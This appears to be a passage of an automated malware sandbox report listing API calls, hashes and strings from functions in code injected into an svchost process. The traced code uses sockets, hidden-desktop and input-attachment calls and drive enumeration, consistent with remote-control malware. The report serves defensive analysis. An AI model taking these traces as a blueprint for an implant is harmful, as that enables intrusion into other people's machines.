                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,02650AA8,000000FF,00000000,00000000,00000000,00000000,76F8F380,?,?,02650AA8,?), ref: 0265AA37
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013,00000000,?,02650AA8,?), ref: 0265AA54
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02650AA8,?), ref: 0265AA5B
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265AA6B
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,02650AA8,000000FF,00000000,00000000,00000000,00000000,?,02650AA8,?), ref: 0265AA88
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharHeapMultiWide$AllocProcessmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 913929354-0
                                                                                                                                                                                                              • Opcode ID: 5842116c87d0f7fdd551b35173a4c691498972a38da8a239f022459b780aaaf4
                                                                                                                                                                                                              • Instruction ID: 9c3417b2e210e9229f02566b4e61cc51b449c91d6a231754fa4a36e4411eea6a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5842116c87d0f7fdd551b35173a4c691498972a38da8a239f022459b780aaaf4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD014F726422367BE63159A99C49FAB7B5CDF46BB0F550310BE15AA2C4DB60DC00C6F4
                                                                                                                                                                                                              Function 02646BB9 Relevance: 7.6, APIs: 5, Instructions: 54memoryregistrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02646C1A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02646C21
                                                                                                                                                                                                              • memset.MSVCRT ref: 02646C35
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02646C4E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02646C5C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocCloseProcesslstrcpynmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3057210225-0
                                                                                                                                                                                                              • Opcode ID: e81ae35be971aa39c22821d1517d56871585113d7a4f8772038e08cb74bc64a5
                                                                                                                                                                                                              • Instruction ID: ce71abe45afca7d4778b609f4624604f1e68470d40f1083d374d4b649c6dcde1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e81ae35be971aa39c22821d1517d56871585113d7a4f8772038e08cb74bc64a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2114E70E412B85BE7269774DD49BDD376CEF09704F000AACFB86D2280DBB08AD48795
                                                                                                                                                                                                              Function 02659970 Relevance: 7.6, APIs: 5, Instructions: 52networkmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,761E23A0,?,?), ref: 0265998D
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02659994
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 026599AF
                                                                                                                                                                                                              • send.WS2_32(?,?,00000000,00000000), ref: 026599C0
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 026599D9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heaprecv$FreeProcesssend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2415998009-0
                                                                                                                                                                                                              • Opcode ID: 72771a680f29f2a9ff6a52e7ab369c53d38d63dd8c4410abf93d9c269fc31b44
                                                                                                                                                                                                              • Instruction ID: 00e2a601f649806269352e838fd82f017e3c954b45f68b91c75951140be90206
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72771a680f29f2a9ff6a52e7ab369c53d38d63dd8c4410abf93d9c269fc31b44
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 070124B2641214BBE7209B688C85FAB7BACAF48700F084155FB05EB280D7749981CBF5
                                                                                                                                                                                                              Function 0264D230 Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000), ref: 0264D242
                                                                                                                                                                                                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 0264D259
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0264D26F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0264D280
                                                                                                                                                                                                              • ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 0264D297
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1270303404-0
                                                                                                                                                                                                              • Opcode ID: 2a8cfb6763dba28281c45ae75dfc1a0d85a24ccf6add9e59cf04c2fbd30a29c1
                                                                                                                                                                                                              • Instruction ID: 39653e904aedb82cba6ffdaaa4e3ac57d6f99caecb6528965379d99bd80e60f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a8cfb6763dba28281c45ae75dfc1a0d85a24ccf6add9e59cf04c2fbd30a29c1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B013175D81218BBE720DB909C49FEE7B7CAB05B05F410784FE45A61C0DBF05A948BE5
                                                                                                                                                                                                              Function 0264E380 Relevance: 7.5, APIs: 5, Instructions: 37threadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,?,00000000,76F93080,?,0264922C,?,00000006,00000000), ref: 0264E38C
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 0264E3A3
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 0264E3A6
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,00000006,?,0264922C), ref: 0264E3BD
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 0264E3C2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$DesktopMessageSendThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3855296974-0
                                                                                                                                                                                                              • Opcode ID: 66fb96d5f76c955725325b52f4d213e248e8e465618f5474e1640f51909801e1
                                                                                                                                                                                                              • Instruction ID: 0e80fae6bef2bee3216e553d63f2c87e00640b689b0809f0ba6f76d77f7ff4a2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66fb96d5f76c955725325b52f4d213e248e8e465618f5474e1640f51909801e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9F08976A416187FD721DB55DC44E5F779CDBC8760F014605FD0197340D6B0EC508AB0
                                                                                                                                                                                                              Function 0264D2B0 Relevance: 7.5, APIs: 5, Instructions: 34threadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0264D2BC
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0264D2C4
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0264D2D0
                                                                                                                                                                                                              • SendMessageA.USER32(?,0000000D,?,?), ref: 0264D2E1
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0264D2ED
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2643679612-0
                                                                                                                                                                                                              • Opcode ID: d1ed42da672b92665bceedb6641907bf11a6b960e0243e1cf81db039ae3852b6
                                                                                                                                                                                                              • Instruction ID: 9d94f315dba0a42ec9887c3eaffd09729fe42690f9e4f97a1b294cc189cbc85a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1ed42da672b92665bceedb6641907bf11a6b960e0243e1cf81db039ae3852b6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6F03072681204BFD3105BA5EC8DFAFBF6CEB49762F515916FA06D7241CAB0986087B0
                                                                                                                                                                                                              Function 0264E340 Relevance: 7.5, APIs: 5, Instructions: 30threadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0264E34A
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0264E352
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02649F24,?,?,?,?,02649400,?,?), ref: 0264E364
                                                                                                                                                                                                              • GetFocus.USER32 ref: 0264E366
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02649F24,?,?,?,?,02649400,?,?), ref: 0264E373
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 968181190-0
                                                                                                                                                                                                              • Opcode ID: 90a14ee3596832ed65da4886112b5d268a7f4084093bb3300c77f340b8e08cbb
                                                                                                                                                                                                              • Instruction ID: b415eff388ca7ff98512ff4cb5c9803470feecde0cf44f863732d3a46031d01b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90a14ee3596832ed65da4886112b5d268a7f4084093bb3300c77f340b8e08cbb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5E09231E80304BBD71057A6AC8DFAFBF6CEB857A2F910555FA0AD3240D9719C5086B4
                                                                                                                                                                                                              Function 026713A0 Relevance: 6.3, APIs: 4, Instructions: 287COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT ref: 026713F9
                                                                                                                                                                                                              • realloc.MSVCRT ref: 02671405
                                                                                                                                                                                                              • malloc.MSVCRT ref: 026714AC
                                                                                                                                                                                                              • realloc.MSVCRT ref: 026714B8
                                                                                                                                                                                                                • Part of subcall function 02670EA0: __WSAFDIsSet.WS2_32(?,?), ref: 02670F50
                                                                                                                                                                                                                • Part of subcall function 02670EA0: closesocket.WS2_32(?), ref: 02670F6D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: mallocrealloc$closesocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 403730927-0
                                                                                                                                                                                                              • Opcode ID: 2355fb6ad8014bb13bbd72be89a6a84084b015642a59fd24907da347cb318e48
                                                                                                                                                                                                              • Instruction ID: 74278bfbc461baf62be18bf2f86d6e0769251ba2fddbcea642e0bc588248e7f9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2355fb6ad8014bb13bbd72be89a6a84084b015642a59fd24907da347cb318e48
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8B1B572E006058FCB08CF28DD90AE937A6EF95301F1985BAED0D9F345D774A951CBA0
                                                                                                                                                                                                              Function 02658220 Relevance: 6.1, APIs: 4, Instructions: 83fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: fwrite$fseek
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3883414211-0
                                                                                                                                                                                                              • Opcode ID: 21c27f2b50f93450bc7f3e4e24ca9eca3b5e1befa845b2f485ba72d708c769c2
                                                                                                                                                                                                              • Instruction ID: 373923f8951b06de1fdc9f97a1837e01725a5fe4926620675df57b31a8615a65
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21c27f2b50f93450bc7f3e4e24ca9eca3b5e1befa845b2f485ba72d708c769c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B621D270A407059FD720CFA8CC81BAEBBF5EF98300F04896DE485E7781D274A980CB91
                                                                                                                                                                                                              Function 02652370 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02652392
                                                                                                                                                                                                              • GetParent.USER32(?), ref: 0265239E
                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000104), ref: 026523B5
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 026523D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ParentTextWindowmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4175915554-0
                                                                                                                                                                                                              • Opcode ID: 9f8d0f980bff0ee1f61f018c8dfc139a9bbd90827e5cb74e3052835de4318b7d
                                                                                                                                                                                                              • Instruction ID: 28817653993f9ea6cf789ed37476498517b3acf737764c421342da24ab239f61
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f8d0f980bff0ee1f61f018c8dfc139a9bbd90827e5cb74e3052835de4318b7d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8014573B4032467D7209EA8ACC8A9BB36CAB10604F40437AFE09E3201EA71D99086E1
                                                                                                                                                                                                              Function 02644090 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020,00000000,-00000010,?,0264432B,?), ref: 0264409C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,0264432B,?), ref: 026440A3
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 026440E2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcess_snprintf
                                                                                                                                                                                                              • String ID: %d.%d.%d.%d
                                                                                                                                                                                                              • API String ID: 1060465051-3491811756
                                                                                                                                                                                                              • Opcode ID: 9262e85d17b144b22b2a0166807686a9f35656bcb4f944a5483114a6cdb5c0a4
                                                                                                                                                                                                              • Instruction ID: fb1c0ff7729851515eab3a3c6c8f205434ee16e10d0f6b751afb1ed37b8ac06c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9262e85d17b144b22b2a0166807686a9f35656bcb4f944a5483114a6cdb5c0a4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70F0A4B1940710AFD370CF699C44B5BBFF8EF0C711B008A2EF58AC6241E63491508BB0
                                                                                                                                                                                                              Function 0265B890 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,00000000,?,?,02658BDE,00000000,02650BE3,?,?,?,?,?,?), ref: 0265B8A0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265B740,00000000,00000000,00000000), ref: 0265B8B5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,02650BE3,00000000,?,?,02658BDE,00000000), ref: 0265B8D3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,02658BDE,00000000), ref: 0265B8E4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1825730051-0
                                                                                                                                                                                                              • Opcode ID: 6406c4f5bb902edbf6ee44337a2b8710f63000062da6d4d33bebb9817979d8ab
                                                                                                                                                                                                              • Instruction ID: e003d757b3cb81f1a3d6375598744325752b9ceab619ccf109a6b9b6bd51c997
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6406c4f5bb902edbf6ee44337a2b8710f63000062da6d4d33bebb9817979d8ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63F0E930AC0315BBE7208FA5DC49F5E37ECAB04B09F102554FD06E22C4DBB4E9508765
                                                                                                                                                                                                              Function 0265F840 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: private$public
                                                                                                                                                                                                              • API String ID: 0-4176808989
                                                                                                                                                                                                              • Opcode ID: f6f662fc5c5770af8a936b8789feaaa54940241ffe5c4c480db400323c5460ef
                                                                                                                                                                                                              • Instruction ID: 33033c70e6ad093c34ea9da3594b991a5023abf93a75e0d37ef0f3c320fc9a89
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6f662fc5c5770af8a936b8789feaaa54940241ffe5c4c480db400323c5460ef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F4169326041254BCB349E6CC5543BB73A2EF87318F684A95DC8BCBBA4FB219941C780
                                                                                                                                                                                                              Function 02644100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick_snprintf
                                                                                                                                                                                                              • String ID: %dd %dh %dm
                                                                                                                                                                                                              • API String ID: 3495410349-3074259717
                                                                                                                                                                                                              • Opcode ID: 65a80a0a11fd88e1b4cdae93d2cf724525e60bdec31493966a2d72d0a6925502
                                                                                                                                                                                                              • Instruction ID: 92452d5891637cd7a251042c1c00e357820f3c75058cb9051aa254140f62bba1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65a80a0a11fd88e1b4cdae93d2cf724525e60bdec31493966a2d72d0a6925502
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97F0E232B4111427E31C681DAD0AABA598B87C87213CDC63DFD0BCF3D8DCA49C6141C4
                                                                                                                                                                                                              Function 0265EB00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: memset.MSVCRT ref: 0265E6CF
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: memset.MSVCRT ref: 0265E6F1
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 0265E706
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: SetErrorMode.KERNEL32(00000001), ref: 0265E71F
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: GetDriveTypeA.KERNEL32(?), ref: 0265E768
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: SetCurrentDirectoryA.KERNEL32(?), ref: 0265E77B
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: FindFirstFileA.KERNEL32(?,?), ref: 0265E7DD
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: SetErrorMode.KERNEL32(?), ref: 0265EAF3
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A63B), ref: 0265EB0B
                                                                                                                                                                                                                • Part of subcall function 026539D0: EnterCriticalSection.KERNEL32(0268FB68,76F90F00,00000000,76F92F00), ref: 026539E9
                                                                                                                                                                                                                • Part of subcall function 026539D0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 026539FB
                                                                                                                                                                                                                • Part of subcall function 026539D0: _snprintf.MSVCRT ref: 02653A1B
                                                                                                                                                                                                                • Part of subcall function 026539D0: SetCurrentDirectoryA.KERNEL32(?), ref: 02653A2B
                                                                                                                                                                                                                • Part of subcall function 026539D0: PathAddBackslashA.SHLWAPI(?), ref: 02653B00
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectory$BackslashDriveErrorModePathmemset$CriticalEnterFileFindFirstLogicalSectionStringsType_snprintf
                                                                                                                                                                                                              • String ID: 8A99A63B$COLV
